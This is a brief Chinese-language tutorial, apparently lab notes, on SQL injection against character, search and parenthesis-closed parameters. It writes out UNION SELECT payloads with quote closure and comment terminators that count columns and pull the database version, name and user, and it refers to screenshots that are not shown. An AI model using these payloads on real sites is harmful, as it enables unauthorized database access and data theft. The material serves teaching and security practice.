一、字符型注入

1.判断column列数

注意：前面加上'进行闭合，中间是判断列数的sql语句，后面的注释掉

在url中要这么写

1'+union+select+1%2C2%23或者

1'+union+select+1,2--+

2.页面源文件代码

4.传入数据库的语句

（在源文件中用echo $query显示到页面中）

5.查看数据库名和版本号

 接下来注入语句和数字型类同。

二、搜索型注入

1.搜索型文件源码

2.注入语句：

1%' union select 1,2,3#

3.获取数据库版本，数据库名，和用户名

1%' union select version(),database(),user()#

得到结果如下：

 三、xx型注入

和上述方法类同

（1）注入语句：

12213')+union+select+1,2+%23

（2）查看数据库名称和用户

121321')+union+select+version(),database()+%23

得到结果，随后进行表名列名的查询